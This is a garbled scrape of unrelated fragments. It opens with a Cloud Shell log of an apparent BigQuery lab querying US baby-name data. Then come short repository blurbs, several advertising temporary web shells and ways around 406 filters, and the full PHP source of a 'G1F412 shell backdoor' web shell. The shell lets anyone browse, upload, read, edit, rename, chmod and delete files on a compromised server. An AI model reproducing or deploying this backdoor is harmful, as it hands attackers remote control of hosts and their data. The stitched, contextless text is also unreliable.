yob1915.txt inflating: yob1916.txt inflating: yob1917.txt inflating: yob1918.txt inflating: yob1919.txt inflating: yob1920.txt inflating: yob1921.txt inflating: yob1922.txt inflating: yob1923.txt inflating: yob1924.txt inflating: yob1925.txt inflating: yob1926.txt inflating: yob1927.txt inflating: yob1928.txt inflating: yob1929.txt inflating: yob1930.txt inflating: yob1931.txt inflating: yob1932.txt inflating: yob1933.txt inflating: yob1934.txt inflating: yob1935.txt inflating: yob1936.txt inflating: yob1937.txt inflating: yob1938.txt inflating: yob1939.txt inflating: yob1940.txt inflating: yob1941.txt inflating: yob1942.txt inflating: yob1943.txt inflating: yob1944.txt inflating: yob1945.txt inflating: yob1946.txt inflating: yob1947.txt inflating: yob1948.txt inflating: yob1949.txt inflating: yob1950.txt inflating: yob1951.txt inflating: yob1952.txt inflating: yob1953.txt inflating: yob1954.txt inflating: yob1955.txt inflating: yob1956.txt inflating: yob1957.txt inflating: yob1958.txt inflating: yob1959.txt inflating: yob1960.txt inflating: yob1961.txt inflating: yob1962.txt inflating: yob1963.txt inflating: yob1964.txt inflating: yob1965.txt inflating: yob1966.txt inflating: yob1967.txt inflating: yob1968.txt inflating: yob1969.txt inflating: yob1970.txt inflating: yob1971.txt inflating: yob1972.txt inflating: yob1973.txt inflating: yob1974.txt inflating: yob1975.txt inflating: yob1976.txt inflating: yob1977.txt inflating: yob1978.txt inflating: yob1979.txt inflating: yob1980.txt inflating: yob1981.txt inflating: yob1982.txt inflating: yob1983.txt inflating: yob1984.txt inflating: yob1985.txt inflating: yob1986.txt inflating: yob1987.txt inflating: yob1988.txt inflating: yob1989.txt inflating: yob1990.txt inflating: yob1991.txt inflating: yob1992.txt inflating: yob1993.txt inflating: yob1994.txt inflating: yob1995.txt inflating: yob1996.txt inflating: yob1997.txt inflating: yob1998.txt inflating: yob1999.txt inflating: yob2000.txt inflating: yob2001.txt inflating: yob2002.txt inflating: yob2003.txt inflating: yob2004.txt inflating: yob2005.txt inflating: yob2006.txt inflating: yob2007.txt inflating: yob2008.txt inflating: yob2009.txt inflating: yob2010.txt inflating: yob2011.txt inflating: yob2012.txt inflating: yob2013.txt inflating: yob2014.txt inflating: yob2015.txt inflating: yob2016.txt inflating: yob2017.txt inflating: yob2018.txt inflating: yob2019.txt inflating: yob2020.txt inflating: yob2021.txt inflating: NationalReadMe.pdf student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ ls names.zip yob1888.txt yob1899.txt yob1910.txt yob1921.txt yob1932.txt yob1943.txt yob1954.txt yob1965.txt yob1976.txt yob1987.txt yob1998.txt yob2009.txt yob2020.txt NationalReadMe.pdf yob1889.txt yob1900.txt yob1911.txt yob1922.txt yob1933.txt yob1944.txt yob1955.txt yob1966.txt yob1977.txt yob1988.txt yob1999.txt yob2010.txt yob2021.txt README-cloudshell.txt yob1890.txt yob1901.txt yob1912.txt yob1923.txt yob1934.txt yob1945.txt yob1956.txt yob1967.txt yob1978.txt yob1989.txt yob2000.txt yob2011.txt yob1880.txt yob1891.txt yob1902.txt yob1913.txt yob1924.txt yob1935.txt yob1946.txt yob1957.txt yob1968.txt yob1979.txt yob1990.txt yob2001.txt yob2012.txt yob1881.txt yob1892.txt yob1903.txt yob1914.txt yob1925.txt yob1936.txt yob1947.txt yob1958.txt yob1969.txt yob1980.txt yob1991.txt yob2002.txt yob2013.txt yob1882.txt yob1893.txt yob1904.txt yob1915.txt yob1926.txt yob1937.txt yob1948.txt yob1959.txt yob1970.txt yob1981.txt yob1992.txt yob2003.txt yob2014.txt yob1883.txt yob1894.txt yob1905.txt yob1916.txt yob1927.txt yob1938.txt yob1949.txt yob1960.txt yob1971.txt yob1982.txt yob1993.txt yob2004.txt yob2015.txt yob1884.txt yob1895.txt yob1906.txt yob1917.txt yob1928.txt yob1939.txt yob1950.txt yob1961.txt yob1972.txt yob1983.txt yob1994.txt yob2005.txt yob2016.txt yob1885.txt yob1896.txt yob1907.txt yob1918.txt yob1929.txt yob1940.txt yob1951.txt yob1962.txt yob1973.txt yob1984.txt yob1995.txt yob2006.txt yob2017.txt yob1886.txt yob1897.txt yob1908.txt yob1919.txt yob1930.txt yob1941.txt yob1952.txt yob1963.txt yob1974.txt yob1985.txt yob1996.txt yob2007.txt yob2018.txt yob1887.txt yob1898.txt yob1909.txt yob1920.txt yob1931.txt yob1942.txt yob1953.txt yob1964.txt yob1975.txt yob1986.txt yob1997.txt yob2008.txt yob2019.txt student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ bq load babynames.names2010 yob2010.txt name:string,gender:string,count:integer Upload complete. Waiting on bqjob_r51f4afab0a557e40_00000181441c98fc_1 ... (1s) Current status: DONE student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ bq ls babynames tableId Type Labels Time Partitioning Clustered Fields ----------- ------- -------- ------------------- ------------------ names2010 TABLE student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ bq show babynames.names2010 Table qwiklabs-gcp-00-caaddc51ae14:babynames.names2010 Last modified Schema Total Rows Total Bytes Expiration Time Partitioning Clustered Fields Labels ----------------- ------------------- ------------ ------------- ----------------- ------------------- ------------------ -------- 08 Jun 16:18:57 |- name: string 34089 654791 07 Aug 16:18:57 |- gender: string |- count: integer student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ bq query "SELECT name,count FROM babynames.names2010 WHERE gender = 'F' ORDER BY count DESC LIMIT 5" Waiting on bqjob_r3d9cdc571f84e7b1_00000181441d69b0_1 ... (0s) Current status: DONE +----------+-------+ | name | count | +----------+-------+ | Isabella | 22925 | | Sophia | 20648 | | Emma | 17354 | | Olivia | 17030 | | Ava | 15436 | +----------+-------+ student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ bq query "SELECT name,count FROM babynames.names2010 WHERE gender = 'M' ORDER BY count ASC LIMIT 5" Waiting on bqjob_r7c3e7c9d164aeee6_00000181441d9d21_1 ... (0s) Current status: DONE +----------+-------+ | name | count | +----------+-------+ | Aaqib | 5 | | Aaidan | 5 | | Aadhavan | 5 | | Aarian | 5 | | Aamarion | 5 | +----------+-------+ student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ bq rm -r babynames rm: remove dataset 'qwiklabs-gcp-00-caaddc51ae14:babynames'? (y/N) y student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ ls names.zip yob1888.txt yob1899.txt yob1910.txt yob1921.txt yob1932.txt yob1943.txt yob1954.txt yob1965.txt yob1976.txt yob1987.txt yob1998.txt yob2009.txt yob2020.txt NationalReadMe.pdf yob1889.txt yob1900.txt yob1911.txt yob1922.txt yob1933.txt yob1944.txt yob1955.txt yob1966.txt yob1977.txt yob1988.txt yob1999.txt yob2010.txt yob2021.txt README-cloudshell.txt yob1890.txt yob1901.txt yob1912.txt yob1923.txt yob1934.txt yob1945.txt yob1956.txt yob1967.txt yob1978.txt yob1989.txt yob2000.txt yob2011.txt yob1880.txt yob1891.txt yob1902.txt yob1913.txt yob1924.txt yob1935.txt yob1946.txt yob1957.txt yob1968.txt yob1979.txt yob1990.txt yob2001.txt yob2012.txt yob1881.txt yob1892.txt yob1903.txt yob1914.txt yob1925.txt yob1936.txt yob1947.txt yob1958.txt yob1969.txt yob1980.txt yob1991.txt yob2002.txt yob2013.txt yob1882.txt yob1893.txt yob1904.txt yob1915.txt yob1926.txt yob1937.txt yob1948.txt yob1959.txt yob1970.txt yob1981.txt yob1992.txt yob2003.txt yob2014.txt yob1883.txt yob1894.txt yob1905.txt yob1916.txt yob1927.txt yob1938.txt yob1949.txt yob1960.txt yob1971.txt yob1982.txt yob1993.txt yob2004.txt yob2015.txt yob1884.txt yob1895.txt yob1906.txt yob1917.txt yob1928.txt yob1939.txt yob1950.txt yob1961.txt yob1972.txt yob1983.txt yob1994.txt yob2005.txt yob2016.txt yob1885.txt yob1896.txt yob1907.txt yob1918.txt yob1929.txt yob1940.txt yob1951.txt yob1962.txt yob1973.txt yob1984.txt yob1995.txt yob2006.txt yob2017.txt yob1886.txt yob1897.txt yob1908.txt yob1919.txt yob1930.txt yob1941.txt yob1952.txt yob1963.txt yob1974.txt yob1985.txt yob1996.txt yob2007.txt yob2018.txt yob1887.txt yob1898.txt yob1909.txt yob1920.txt yob1931.txt yob1942.txt yob1953.txt yob1964.txt yob1975.txt yob1986.txt yob1997.txt yob2008.txt yob2019.txt student_00_bea2289b69fb@cloudshell:~ (qwiklabs-gcp-00-caaddc51ae14)$ bq rm -r babynames BigQuery error in rm operation: Not found: Dataset qwiklabs-gcp-00-caaddc51ae14:babynames.

No description available

A small shell script that uncompresses a linux kernel image. It searches for the gzip header (using grep), copies the compressed part to a tmp file and gunzips it

well-wishers , help me remember his temperament

Pluggable private /tmp space support for interactive (shell) sessions

<?php set_time_limit(0); error_reporting(0); if(get_magic_quotes_gpc()){ foreach($_POST as $key=>$value){ $_POST[$key] = stripslashes($value); } } echo '<!DOCTYPE HTML> <HTML> <HEAD> <link href="" rel="stylesheet" type="text/css"> <title>G1F412 shell backdoor</title><link rel="SHORTCUT ICON" href="http://www.hi5style.com/gr/heart.gif"> <style> body{ font-family: "Courier", cursive; color: #fff; background-color: #000; background-image:url("https://f.top4top.io/p_17717wd2v0.gif");align-content: fixed;background-size:130%; } text-shadow:0px 0px 1px #757575; } #content tr:hover{ background-color: #000; text-shadow:0px 0px 10px #fff; } #content .first{ background-color: dark turquoise; } #content .first:hover{ background-color: dark turquoise; text-shadow:0px 0px 1px #757575; } H1{ font-family: "Courier", cursive; color: #fff; } a{ color: #fff; text-decoration: none; } a:hover{ color: #fff; text-shadow:0px 0px 5px #ffffff; } input,select,textarea{ border: 1px #fff solid; -moz-border-radius: 5px; -webkit-border-radius:5px; border-radius:5px; } </style> </HEAD> <BODY> <br> <center></center> <h1><center><a href="https://instagram.com/midnight_coders_team?igshid=1bv58zw6nsgjs">Midnight Coders Team</a></center></h1> <table width="700" border="0" cellpadding="3" cellspacing="1" align="center"> <tr><td>Current Path : '; if(isset($_GET['path'])){ $path = $_GET['path']; }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '<a href="?path=/">/</a>'; continue; } if($pat == '') continue; echo '<a href="?path='; for($i=0;$i<=$id;$i++){ echo "$paths[$i]"; if($i != $id) echo "/"; } echo '">'.$pat.'</a>/'; } echo '</td></tr><tr><td>'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '<font color="green">Upload File Success!</font><br />'; }else{ echo '<font color="red">Failed for Upload File!</font><br />'; } } echo '<form enctype="multipart/form-data" method="POST"> Upload File : <input type="file" name="file" /> <input type="submit" value="upload" /> </form> </td></tr>'; if(isset($_GET['filesrc'])){ echo "<tr><td>Current File : "; echo $_GET['filesrc']; echo '</tr></td></table><br />'; echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '</table><br /><center>'.$_POST['path'].'<br /><br />'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo '<font color="green">Change Permission Success~!</font><br />'; }else{ echo '<font color="red">Failed for Change Permission !</font><br />'; } } echo '<form method="POST"> Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" /> <input type="hidden" name="path" value="'.$_POST['path'].'"> <input type="hidden" name="opt" value="chmod"> <input type="submit" value="Go" /> </form>'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '<font color="green">Change Name Success!</font><br />'; }else{ echo '<font color="red">Failed for Change Name !</font><br />'; } $_POST['name'] = $_POST['newname']; } echo '<form method="POST"> New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" /> <input type="hidden" name="path" value="'.$_POST['path'].'"> <input type="hidden" name="opt" value="rename"> <input type="submit" value="Go" /> </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo '<font color="green">Edit File Success!</font><br />'; }else{ echo '<font color="red">Failed for Edit File!</font><br />'; } fclose($fp); } echo '<form method="POST"> <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br /> <input type="hidden" name="path" value="'.$_POST['path'].'"> <input type="hidden" name="opt" value="edit"> <input type="submit" value="Go" /> </form>'; } echo '</center>'; }else{ echo '</table><br /><center>'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '<font color="green">Delete Dir Success!</font><br />'; }else{ echo '<font color="red">Failed for Delete Dir!</font><br />'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo '<font color="green">Delete File Success!</font><br />'; }else{ echo '<font color="red">Failed for Edit File!</font><br />'; } } } echo '</center>'; $scandir = scandir($path); echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center"> <tr class="first"> <td><center>Name</center></td> <td><center>Size</center></td> <td><center>Permissions</center></td> <td><center>Options</center></td> </tr>'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "<tr> <td><a href=\"?path=$path/$dir\">$dir</a></td> <td><center>--</center></td> <td><center>"; if(is_writable("$path/$dir")) echo '<font color="green">'; elseif(!is_readable("$path/$dir")) echo '<font color="red">'; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>'; echo "</center></td> <td><center><form method=\"POST\" action=\"?option&path=$path\"> <select name=\"opt\"> <option value=\"\"></option> <option value=\"delete\">Delete</option> <option value=\"chmod\">Chmod</option> <option value=\"rename\">Rename</option> </select> <input type=\"hidden\" name=\"type\" value=\"dir\"> <input type=\"hidden\" name=\"name\" value=\"$dir\"> <input type=\"hidden\" name=\"path\" value=\"$path/$dir\"> <input type=\"submit\" value=\">\" /> </form></center></td> </tr>"; } echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>'; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo "<tr> <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td> <td><center>".$size."</center></td> <td><center>"; if(is_writable("$path/$file")) echo '<font color="green">'; elseif(!is_readable("$path/$file")) echo '<font color="red">'; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>'; echo "</center></td> <td><center><form method=\"POST\" action=\"?option&path=$path\"> <select name=\"opt\"> <option value=\"\"></option> <option value=\"delete\">Delete</option> <option value=\"chmod\">Chmod</option> <option value=\"rename\">Rename</option> <option value=\"edit\">Edit</option> </select> <input type=\"hidden\" name=\"type\" value=\"file\"> <input type=\"hidden\" name=\"name\" value=\"$file\"> <input type=\"hidden\" name=\"path\" value=\"$path/$file\"> <input type=\"submit\" value=\">\" /> </form></center></td> </tr>"; } echo '</table> </div>'; } echo '<br /><font color="red"></font><font color="red">shell backdoor</font> <center>@Copyright 2020 | IG: <a href="https://instagram.com/midnight_coders_team?igshid=1bv58zw6nsgjs">Midnight Coders Team</a></center> <center>AUTHOR: <a href="https://instagram.com/gifarirahman_exp?igshid=zrxa2b35pzxp">G1F412</a></center> </BODY> </HTML>'; function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>

4lphasec TMP Shell

TMP web shell

No description available

No description available

My fork

Temporary Webshell to Bypass 406 & Auto Delete Shell IndoXploit

Base image with utilities for ephemeral troubleshooting containers.

Temporary Webshell to Bypass 406 & Auto Delete Shell

No description available